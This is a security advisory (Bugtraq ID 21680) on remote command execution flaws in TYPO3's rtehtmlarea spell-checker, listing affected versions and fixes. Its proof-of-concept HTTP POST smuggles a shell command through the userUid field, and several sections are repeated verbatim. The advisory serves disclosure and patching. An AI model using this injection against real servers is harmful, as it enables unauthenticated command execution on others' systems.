Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
BID:21680
Info
Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
| Bugtraq ID: | 21680 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 20 2006 12:00AM |
| Updated: | Dec 20 2006 09:32PM |
| Credit: | D. Fabian and J. Greil are credited with the discovery of these issues. |
| Vulnerable: |
Typo3 Typo3 4.0.3 Typo3 Typo3 4.0.2 Typo3 Typo3 4.0.1 Typo3 Typo3 3.7 .0 Typo3 Typo3 4.0 Typo3 Typo3 3.8 |
| Not Vulnerable: |
Typo3 Typo3 4.0.4 |
Discussion
Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
TYPO3 is prone to multiple vulnerabilities that allow attackers to execute arbitrary commands. This issue occurs because the application fails to properly sanitize user-supplied data.
Exploiting these issues allows unauthenticated attackers to execute arbitrary system commands with the privileges of the application.
Versions 4.0 to 4.0.3 and 4.1beta are vulnerable; versions 3.7 and 3.8 are also vulnerable if they have the optional 'rtehtmlarea' extension installed.
TYPO3 is prone to multiple vulnerabilities that allow attackers to execute arbitrary commands. This issue occurs because the application fails to properly sanitize user-supplied data.
Exploiting these issues allows unauthenticated attackers to execute arbitrary system commands with the privileges of the application.
Versions 4.0 to 4.0.3 and 4.1beta are vulnerable; versions 3.7 and 3.8 are also vulnerable if they have the optional 'rtehtmlarea' extension installed.
Exploit / POC
Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
Attackers can exploit these issues via a web client.
The following proof-of-concept example is available:
POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-
check-logic.php?id=1 HTTP/1.1
Host: www.example.com
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+
/tmp/shell.txt+%23&enablePersonalDicts=true
Attackers can exploit these issues via a web client.
The following proof-of-concept example is available:
POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-
check-logic.php?id=1 HTTP/1.1
Host: www.example.com
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+
/tmp/shell.txt+%23&enablePersonalDicts=true
Solution / Fix
Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
Solution:
The vendor has released fixes to address these issues. Please see the references for more information.
Typo3 Typo3 3.8
Typo3 Typo3 4.0
Typo3 Typo3 3.7 .0
Typo3 Typo3 4.0.1
Typo3 Typo3 4.0.2
Typo3 Typo3 4.0.3
Solution:
The vendor has released fixes to address these issues. Please see the references for more information.
Typo3 Typo3 3.8
-
Typo3 typo3_src-4.0.4.tar.gz
http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?downlo ad
Typo3 Typo3 4.0
-
Typo3 typo3_src-4.0.4.tar.gz
http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?downlo ad
Typo3 Typo3 3.7 .0
-
Typo3 typo3_src-4.0.4.tar.gz
http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?downlo ad
Typo3 Typo3 4.0.1
-
Typo3 typo3_src-4.0.4.tar.gz
http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?downlo ad
Typo3 Typo3 4.0.2
-
Typo3 typo3_src-4.0.4.tar.gz
http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?downlo ad
Typo3 Typo3 4.0.3
-
Typo3 typo3_src-4.0.4.tar.gz
http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?downlo ad
References
Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
References:
References:
- Synnefoims Homepage (synnefoims)
- Typo3 Command Execution Vulnerability (SEC Consult Research)